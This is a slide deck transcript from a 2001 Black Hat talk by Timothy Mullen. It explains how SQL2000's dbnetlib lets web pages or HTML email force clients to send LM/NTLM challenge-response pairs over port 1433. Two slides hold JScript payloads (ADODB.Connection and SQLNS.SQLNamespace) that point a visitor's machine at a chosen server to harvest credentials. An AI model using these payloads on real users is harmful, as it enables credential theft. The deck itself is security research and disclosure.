Download
1 / 13
130 likes | 248 Vues
This presentation by Timothy Mullen at Blackhat Vegas 2001 delves into the vulnerabilities of SQL2000, particularly emphasizing the exploitation of LM/NTLM challenge-response pairs over TCP/IP sockets. It discusses the shift from named pipes to TCP/IP for integrated authentication and identifies the risks posed by improperly configured routers that allow traffic through port 1433. Various examples illustrate how SQL namespaces and ADODB can be exploited for credential theft, underscoring the urgency for better security practices in database authentication.
E N D
Grabbin’ Creds:Forcing SQL libs to deliver LM/NT challenge and response on the back channel… Timothy M. Mullen AnchorIS.Com, Inc. thor@hammerofgod.com Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
The Culprit:SQL2000 Super Sockets Lib • New functions in dbnetlib.dll! • Supports TCP/IP Sockets, encryption, authentication, etc. • Default library on workstations that have SQL2k client utilities installed. (MSDE as well?) Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
Backgrounders… • SQL 7 also supported TCP/IP sockets, but only for Mixed Mode authentication (SQL maintained its own accounts) • Integrated Authentication (NTLM Creds) needed Named Pipes • Named Pipes required 139/445 open to authenticating system. Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
Backgrounders… cont. • Integrated Authentication has _always_ been the recommended configuration. • 139/445 has long been blocked at the router (if not, you are a yum-yum.) • Many server-to-server apps authenticate over TCP 1433 because it is “safe” . Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
The Skinny • DBNETLIB now directly supports integrated authentication over standard TCP/IP sockets – default port 1433. • The LM/NTLM challenge/response pairs can now be sent out via 1433 (other other ports if changed) Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
The Problem • Many routers, though specifically blocking 139/445, still allow established traffic out- I.e. 1433 outbound is free to pass. • Many have 1433 explicitly open for application support, server-to-server queries, etc. Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
The Sting • Client side ODBC connections can specify the target server, authentication type, and the library to use. • Web sites can request client to perform ADODB recordset requests, as well as other tasks. • HTML email as well. Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
Somewhat Lame Example • Web site with following tag: { conn=new ActiveXObject("ADODB.Connection"); conn.ConnectionString='Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib'; conn.Open(); } Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
Example Cont… • User is presented with “This page is accessing a data source from another domain. Do you want to allow this?” dialog box. • Easily engineered around… Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
Not So Lame Example • Lets try this one: { ns = new ActiveXObject("SQLNS.SQLNamespace"); ns.Initialize ("Grabber", 2, "Server=10.1.1.1;Trusted_Connection=Yes;Network Library=dbnetlib.dll"); } Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
What’s the difference? • SQLNamespace, SQL Distribution Control, and SQL Merge control are all scriptable, and are marked _safe for scripting_ ! • Silently grab the creds for fun and profit! Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
Live Demo • Don’t try this at home! Professional driver on closed course. Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
Thanks! AnchorIS.Com www.anchoris.com HammerofGod www.hammerofgod.com Timothy M. Mullen tmullen@anchoris.com thor@hammerofgod.com Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
